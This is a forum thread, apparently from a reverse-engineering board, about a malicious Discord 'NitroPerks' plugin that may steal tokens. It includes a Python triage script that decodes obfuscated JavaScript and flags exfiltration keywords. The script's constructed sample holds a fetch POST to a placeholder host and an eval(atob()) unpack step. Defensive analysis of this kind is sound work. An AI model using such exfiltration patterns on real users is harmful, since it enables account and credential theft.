SciT Posted July 30, 2021 (edited) Hi. Literally an hour ago, a massive phishing link was sent on Discord across all private messages and servers, which is why many channels blocked me and/or muted me. I remembered that some time ago I came across the so-called Discord Perks that improve the user experience. And last time I was not embarrassed by the fact that I load extraneous scripts without proper analysis. I found the files that I downloaded, began to analyze them in more detail and found too suspicious and obvious malware insertions. Could you help de-obfuscate the part that was obfuscated, to understand where and how the data was sent? A large number of people were affected by this plugin, as they saw ads on other resources, including videos. The presence of such keywords as: POST, ip, token, authToken, userEmail, email, log, data, etc. NitroPerks.plugin.js Edited July 30, 2021 by SciT (eng formatting)
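A static triage pass along these lines, added here as an example (my own code, not the plugin or anything attached in this thread), resolves the hex/unicode string escapes that obfuscators use to split up words, then checks the decoded text for the keywords listed above, any URLs, and runtime string-unpacking calls. The SAMPLE input is constructed for illustration and does not come from NitroPerks.plugin.js.

```python
import re

# Keywords the OP reported seeing in the plugin; matched as whole words, case-sensitive.
EXFIL_KEYWORDS = ["POST", "ip", "token", "authToken", "userEmail", "email", "log", "data"]
# Calls commonly used to unpack or execute hidden strings at runtime (indicators, not proof of malice).
OBFUSCATION_MARKERS = ["eval(", "Function(", "atob(", "fromCharCode(", "unescape("]

# Constructed sample: two hex-escaped strings ("authToken", "POST"), a fetch to a placeholder host
# and an eval(atob(...)) unpack step. Not real plugin code.
SAMPLE = (
    'var _0xa=["\\x61\\x75\\x74\\x68\\x54\\x6f\\x6b\\x65\\x6e","\\x50\\x4f\\x53\\x54"];'
    'fetch("https://example.invalid/collect",{method:_0xa[1],body:JSON.stringify(d)});'
    'eval(atob(p));'
)


def decode_escapes(js_text: str) -> str:
    """Turn \\xNN and \\uNNNN escapes back into characters so split-up words become searchable."""
    js_text = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), js_text)
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), js_text)


def triage(js_text: str) -> dict:
    """Static indicators for a plugin file: escape density, exfil keywords, URLs, unpacking calls."""
    decoded = decode_escapes(js_text)
    # Count escapes in the raw text: a high density is itself a sign of string obfuscation.
    escapes = len(re.findall(r"\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}", js_text))
    keywords = sorted({k for k in EXFIL_KEYWORDS if re.search(rf"\b{re.escape(k)}\b", decoded)})
    urls = sorted(set(re.findall(r"https?://[\w.\-]+(?:/[\w./?=&%\-]*)?", decoded)))
    markers = [m for m in OBFUSCATION_MARKERS if m in decoded]
    return {"escaped_chars": escapes, "keywords": keywords, "urls": urls, "obfuscation": markers}


if __name__ == "__main__":
    # On the constructed sample this reports POST/authToken, the placeholder URL and eval/atob.
    print(triage(SAMPLE))
```

Run it over the real plugin file with `triage(open("NitroPerks.plugin.js").read())`; URLs that only appear after decoding, next to token/email keywords, are the first places to look for the exfiltration path.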
SciT Posted August 10, 2021 (Author) Up. Help find out if other accounts have been affected. Perhaps all the cookies were stolen; I cannot find out.
RDGMax Posted August 10, 2021 https://www.hybrid-analysis.com/sample/15b45f8c4732f81361ba51a14b8664f5532e22defa9597de99b55e3a0d263b5a/6112712dcc5bc6285509d939#mitre-matrix-modal
kao Posted August 10, 2021 @RDGMax: Did you even look at the results before you posted them? That sandbox output is completely useless. Sandbox tried to run the file using WScript and failed spectacularly. All the important code is well protected and can't be extracted this way.
RDGMax Posted August 10, 2021 48 minutes ago, kao said: @RDGMax: Did you even look at the results before you posted them? That sandbox output is completely useless. Sandbox tried to run the file using WScript and failed spectacularly. All the important code is well protected and can't be extracted this way. You don't see anything??? 🙈 That analysis is very useful for me, to take a decision to classify it as malware.
kao Posted August 12, 2021 No, I don't see anything malicious there, for the reasons explained above. If you disagree, I kindly invite you to show *exactly* where and what is to be considered malicious. On 8/10/2021 at 4:01 PM, RDGMax said: that analysis is very useful for me. to take a decision.to classify as malware #1 - OP has already established that this file is malicious - that was not the question. The question was - what was stolen, how, and where was it sent to? #2 - Would you call this file malicious too? (see attachment) https://www.hybrid-analysis.com/sample/017d4223a35619fe0002007e32e889796598846d8a131b8fd1cd3d0057c6fbb3/611556f3da7fb81f775036f1 1d10ts-v2.zip
RDGMax Posted August 12, 2021 The main file is a downloader; here is a file it downloaded... there are dozens of files. I think the file has been infected by some other software. nitro2.rar